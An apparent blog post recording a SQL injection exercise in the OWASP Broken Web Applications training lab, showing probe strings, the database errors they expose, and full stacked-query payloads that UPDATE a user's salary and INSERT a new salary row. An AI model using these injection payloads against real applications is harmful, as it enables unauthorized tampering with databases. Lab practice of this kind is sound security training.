Android && Security: OwaspBWA - Modify&Add Data with SQL Injection

Injection flaws - Modify&Add Data with SQL Injection

How To

Result from : sql injection Me

Results:
Error string found: 'Column not found'Tested value: ' OR username IS NOT NULL OR username = '
Error string found: 'Column not found'Tested value: 1' AND non_existant_table = '1

-----------------------------------------------------

1.OwaspBWA>Submit : ' OR username IS NOT NULL OR username = '

Results : //*Blue = Original statement , Red = Injection statement

Column not found: USERNAME in statement [SELECT * FROM salaries WHERE userid = '' OR username IS NOT NULL OR username = '']

SQL Injection Query
Column not found: USERNAME in statement [SELECT * FROM salaries WHERE userid = ''; UPDATE salaries SET SALARY = 999999 WHERE userid='jsmith']

3.)Complete Injection Update

'; UPDATE salaries SET SALARY = 999999 WHERE userid='jsmith

OR - Add Data with SQL Injection

'; INSERT INTO salaries (userid,salary) VALUES ('ak1', 999999999);--

Android && Security

OwaspBWA - Modify&Add Data with SQL Injection

Injection flaws - Modify&Add Data with SQL Injection

OR - Add Data with SQL Injection

Online Course

Archives

DIVA

OwaspBWA

Coding

Visited

note